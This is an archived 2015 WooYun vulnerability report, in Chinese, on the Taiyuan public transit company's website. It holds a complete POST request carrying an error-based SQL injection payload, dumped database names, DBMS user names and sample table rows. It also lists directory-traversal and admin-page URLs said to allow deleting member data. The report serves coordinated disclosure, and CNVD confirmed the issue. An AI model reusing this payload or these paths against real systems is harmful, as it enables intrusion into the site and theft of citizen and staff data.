当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109115

漏洞标题:太原公交控股有限公司漏洞打包

相关厂商:cncert国家互联网应急中心

漏洞作者: small_persimmon

提交时间:2015-04-24 12:56

修复时间:2015-06-12 09:42

公开时间:2015-06-12 09:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-28: 厂商已经确认,细节仅向厂商公开
2015-05-08: 细节向核心白帽子及相关领域专家公开
2015-05-18: 细节向普通白帽子公开
2015-05-28: 细节向实习白帽子公开
2015-06-12: 细节向公众公开

简要描述:

太原公共交通控股(集团)有限公司于2008年9月19日成立。它由原太原市公共交通总公司、太原市同航巴士有限公司、太原市同业巴士有限公司和太原市同利小公共汽车有限公司整合组建而成,为有限责任公司性质。
集团公司下设6个运营分公司,一个出租汽车公司、汽车保修厂和物资公司,注册资本金17837.87万元,在册职工8121人,运营车辆3011台,运营线路150条,线路长度2455.55公里,日均行驶里程38.1万公里,日均客运量140.43万人次。

详细说明:

#1 POST 注入一枚 造成 市民ic 卡,在职员工,司机,客服等信息泄漏
注入文本

POST /more.asp HTTP/1.1
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
Cookie: TklSys=ResourceList%5FCurrentPage=2&ResourceList%5FParent=0&ResourceList%5FWorkType=; ASPSESSIONIDQCQCTDCA=KLBGHEJBMNFGABIPLEIPKAGE; isvoted=voteid2=2; Tsys%5FComment=Email=sample%40email%2Etst&Title=Mr%2E
Host: www.tybus.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Parent=0&SearchButton=%c8%b7%20%20%b6%a8&sKey=1&sType=(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(48)%2bCHAR(119)%2bCHAR(50)%2bCHAR(100)%2bCHAR(69)%2bCHAR(74)%2bCHAR(55)%2bCHAR(89))%20FROM%20syscolumns)&Work=


1.PNG


数据库25个

available databases [25]
[*] bak2010
[*] bak2011
[*] bike
[*] cnh1001_db
[*] database2
[*] dicuz
[*] ERP
[*] gjmis2011
[*] gjmis2012
[*] gjmis2013
[*] gjmis_system
[*] gjmisth2007
[*] GJOA
[*] GJWY
[*] ick
[*] kefu
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] webtest
[*] YCZ


管理员信息:

database management system users [5]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] qhb
[*] sa
[*] zh


部分泄漏信息

Database: ick
Table: xjhzk_kefu
[5 entries]
+----+----+------+--------+------+--------+------+--------+--------+------+----------+------+------+--------------------+-------+-------+------+-------+-------+-------+--------------------+--------------+
| cb | tc | jhtc | rybh | cdbh | xlbh | dwbz | sfjh | hzkh | dwbh | ryxm | sjbz | sjlx | hzrq | xlgl | qcbh | ygbh | xfrss | xfjee | sfile | datee | listno |
+----+----+------+--------+------+--------+------+--------+--------+------+----------+------+------+--------------------+-------+-------+------+-------+-------+-------+--------------------+--------------+
| 0 | 5 | 0 | 199999 | 0001 | 000828 | 01 | 000000 | A | 9000 | 甲班 | 00 | 80 | 01 2 2012 12:00AM | 77.25 | 趟828 | 0005 | 0.00 | 0.00 | 0 | 01 1 2012 12:00AM | 022002265485 |
| 0 | 2 | 0 | 199999 | 0001 | 000821 | 01 | 000000 | A | 9000 | 甲班 | 00 | 80 | 01 2 2012 12:00AM | 73 | 趟821 | 0005 | 0.00 | 0.00 | 0 | 01 1 2012 12:00AM | 022002265486 |
| 0 | 11 | 0 | 199999 | 0001 | 000817 | 01 | 000000 | A | 8000 | 甲班 | 00 | 80 | 01 2 2012 12:00AM | 325.6 | 趟817 | 0005 | 0.00 | 0.00 | 0 | 01 1 2012 12:00AM | 022002265487 |
| 0 | 1 | 0 | 199999 | 0001 | 006182 | 01 | 000000 | A | 9000 | 甲班 | 00 | 80 | 01 2 2012 12:00AM | 29.2 | 趟6182 | 0005 | 0.00 | 0.00 | 0 | 01 1 2012 12:00AM | 022002265488 |
| 0 | 4 | 0 | 199999 | 0001 | 000619 | 01 | 000000 | A | 9000 | 甲班 | 00 | 80 | 01 2 2012 12:00AM | 135.2 | 趟619 | 0005 | 0.00 | 0.00 | 0 | 01 1 2012 12:00AM | 022002265489 |
+----+----+------+--------+------+--------+------+--------+--------+------+----------+------+------+--------------------+-------+-------+------+-------+-------+-------+--------------------+--------------+


5.PNG


#2 目录遍历 信息泄漏 任意删除会员信息
http://www.tybus.com/Article/Development/2008/

2.PNG


http://www.tybus.com/article/

3.PNG


可任意删除 修改信息
http://www.tybus.com/ad/@users4345435/manage.asp

4.PNG


#3后台登陆以及密码(时间问题未破解) 登录名 密码 数据库处获得
论坛登陆
http://www.tybus.com/gbook/userlogin.asp

6.PNG


主站登陆
http://www.tybus.com/ad/Manage/Login.asp

7.PNG


登录信息:

8.PNG


9.PNG

漏洞证明:

1.PNG

修复方案:

版权声明:转载请注明来源 small_persimmon@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-28 09:41

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给相应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无